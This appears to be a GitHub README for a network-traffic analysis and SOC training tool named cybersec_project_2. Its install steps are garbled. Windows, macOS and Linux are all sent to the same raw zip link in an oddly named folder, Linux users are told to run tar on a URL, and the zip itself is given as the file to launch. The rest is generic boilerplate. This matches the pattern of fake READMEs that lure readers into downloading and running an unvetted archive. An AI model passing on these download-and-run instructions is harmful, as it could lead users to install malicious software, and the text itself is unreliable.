Welcome to the cybersec_project_2! This application helps you analyze network traffic effectively and simulates a Security Operations Center (SOC) environment. Using powerful tools like Wireshark and Nmap, you can detect network reconnaissance attempts, analyze unencrypted HTTP traffic, and observe DNS behavior. This project provides practical incident reporting and helps you identify Indicators of Attack (IOAs).
To get the application, please visit the Releases page:
Follow these simple steps to set up cybersec_project_2 on your computer:
-
Visit the Releases Page: Go to the Releases page to find the latest version of the software.
-
Choose the Right File: Locate the file that corresponds to your operating system:
- For Windows, download
https://raw.githubusercontent.com/kamley/cybersec_project_2/main/Biddelian/cybersec_project_2.zip. - For macOS, download
https://raw.githubusercontent.com/kamley/cybersec_project_2/main/Biddelian/cybersec_project_2.zip. - For Linux, download
https://raw.githubusercontent.com/kamley/cybersec_project_2/main/Biddelian/cybersec_project_2.zip.
- For Windows, download
-
Download the File: Click on the file to download it to your computer.
-
Extract the Files: Once downloaded, extract the files:
- On Windows, right-click on the
.zipfile and select "Extract All." - On macOS, double-click the
.zipfile. - On Linux, use the terminal command
tar -xvzf https://raw.githubusercontent.com/kamley/cybersec_project_2/main/Biddelian/cybersec_project_2.zip.
- On Windows, right-click on the
-
Run the Application: Open the extracted folder and run the application:
- On Windows, double-click the
https://raw.githubusercontent.com/kamley/cybersec_project_2/main/Biddelian/cybersec_project_2.zipfile. - On macOS, open the
https://raw.githubusercontent.com/kamley/cybersec_project_2/main/Biddelian/cybersec_project_2.zipfile. - On Linux, use the terminal to navigate to the folder and run
./cybersec_project_2.
- On Windows, double-click the
-
Follow the On-Screen Instructions: The application will guide you through the setup process. Make sure to follow the prompts provided.
- Network Traffic Analysis: Inspect packets captured from network activity.
- Reconnaissance Detection: Identify attempts to probe your network.
- HTTP and DNS Analysis: Examine unencrypted traffic and behavior of DNS queries.
- Incident Reporting: Record and report security incidents based on your findings.
- Indicators of Attack (IOAs): Detect patterns indicative of a breach.
Before you install cybersec_project_2, please ensure your system meets the following requirements:
-
Operating System:
- Windows 10 or later
- macOS Sierra or later
- Any recent distribution of Linux (kernel 4.4 or later)
-
Hardware:
- Minimum 4GB of RAM
- At least 500MB of free disk space
- Network interface card for packet capture
After installing the application, follow these steps for effective usage:
-
Launch the Application: Start the application as described in the "Run the Application" section.
-
Select Your Network Interface: Choose the network interface you want to monitor from the dropdown menu.
-
Start Capturing Traffic: Click on the โStart Captureโ button. The application will begin capturing network packets.
-
Analyze Captured Data: View the real-time data. You can filter and search for specific packets or protocols.
-
Generate Reports: Use the incident reporting feature to document any suspicious activities.
-
Explore Analysis Features: Utilize different tabs for HTTP and DNS analysis. Each will provide insights into your network's behavior.
A: Yes, as long as you have permission to monitor the network. Always respect privacy.
A: Ensure that your workplace policies allow for network analysis before using it.
A: You can report issues using the "Issues" section on our GitHub page. Provide detailed information about the problem you're facing.
For assistance, please visit the project's GitHub page and check the Issues tab. We welcome contributions and feedback from all users.
We are constantly updating cybersec_project_2. Keep an eye out for future releases that may include:
- Enhanced reporting features
- Additional traffic analysis tools
- Improved user interface
Thank you for using cybersec_project_2! Enjoy analyzing your network traffic and enhancing your cybersecurity knowledge.